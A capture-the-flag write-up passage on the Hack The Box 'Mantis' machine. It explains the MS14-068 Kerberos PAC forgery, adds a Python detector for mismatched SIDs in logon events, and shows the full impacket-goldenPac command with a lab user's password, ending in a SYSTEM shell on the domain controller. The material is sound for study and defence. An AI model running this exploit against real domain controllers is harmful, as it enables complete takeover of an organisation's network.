CVE-2014-6324 (GoldenPac)


according to MITRE, CVE-2014-6324 is a bug in the KDC that allows an attacker to forge a PAC (Privilege Attribute Certificate)

  • is an extension to the Kerberos protocol that Active Directory uses to carry authorization data (group membership and rights)
  • is carried in every ticket (TGT or TGS) and is what the service bases its access decisions on
  • is encrypted with the KDC key (in a TGT) or with the requested service account’s key (in a TGS)
  • can be thought of as the user’s security badge: it opens the doors the user is allowed through, and no others

Microsoft also issued a security bulletin, MS14-068, for this vulnerability
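As an added defender-side example (not part of the original writeup): Microsoft's guidance for this bulletin pointed at logon events where the account name and the security ID in the event disagree, which is exactly what a forged PAC produces. The flattened event lines and the SID-to-account map below are constructed; the only value taken from the page is the domain SID printed by goldenPac.

```python
import re
from typing import Dict, List, Tuple

# Domain SID as printed by goldenPac above; everything else here is constructed.
DOMAIN_SID = "S-1-5-21-4220043660-4019079961-2895681657"

# Constructed Security-log events in flattened key=value form (not real logs).
# Field names follow the Windows 4624 (logon) and 4672 (special privileges) events.
SAMPLE_EVENTS = f"""\
EventID=4624 LogonType=3 SecurityID={DOMAIN_SID}-1103 AccountName=james
EventID=4624 LogonType=3 SecurityID={DOMAIN_SID}-500 AccountName=james
EventID=4672 SecurityID={DOMAIN_SID}-500 AccountName=james
EventID=4624 LogonType=10 SecurityID={DOMAIN_SID}-500 AccountName=Administrator
EventID=4624 LogonType=3 SecurityID={DOMAIN_SID}-1103 AccountName=james
"""

# Constructed directory snapshot: the account each SID really belongs to.
SID_TO_ACCOUNT: Dict[str, str] = {
    f"{DOMAIN_SID}-500": "Administrator",
    f"{DOMAIN_SID}-1103": "james",
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(text: str) -> List[Dict[str, str]]:
    """Turn each non-empty line into a dict of its key=value fields."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]


def find_pac_mismatches(text: str, sid_to_account: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (EventID, SecurityID, AccountName) for 4624/4672 events whose SID
    resolves to a different account than the one named in the event.
    A forged PAC keeps the authenticating user's name but carries the
    privileged SID that was inserted, so the two fields disagree."""
    hits: List[Tuple[str, str, str]] = []
    for ev in parse_events(text):
        if ev.get("EventID") not in ("4624", "4672"):
            continue
        sid, name = ev.get("SecurityID", ""), ev.get("AccountName", "")
        expected = sid_to_account.get(sid)  # unknown SIDs are skipped, not flagged
        if expected is not None and expected.lower() != name.lower():
            hits.append((ev["EventID"], sid, name))
    return hits


if __name__ == "__main__":
    for event_id, sid, name in find_pac_mismatches(SAMPLE_EVENTS, SID_TO_ACCOUNT):
        print(f"suspicious {event_id}: {name} logged on with SID {sid} "
              f"(directory says that SID belongs to {SID_TO_ACCOUNT[sid]})")
```

On a real domain controller the same comparison is run against the Security log with the SID-to-account map pulled from the directory rather than hard-coded.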

impacket-goldenPac is the tool that automates the whole process

I will get to it, as all it needs is a domain user

┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-goldenPac htb.local/james@mantis.htb.local -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
password: J@m3s_P@ssW0rd!
[*] user sid: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] forest sid: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file OGiBnuIR.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service TGJB on 10.10.10.52.....
[*] Starting service TGJB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
mantis
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::ac61:2d8f:a212:6372
   link-local ipv6 address . . . . . : fe80::ac61:2d8f:a212:6372%11
   ipv4 address. . . . . . . . . . . : 10.10.10.52
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
tunnel adapter isatap.{f163287b-37d4-42ac-8358-59bd4fbfbe46}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 

Domain Level Compromise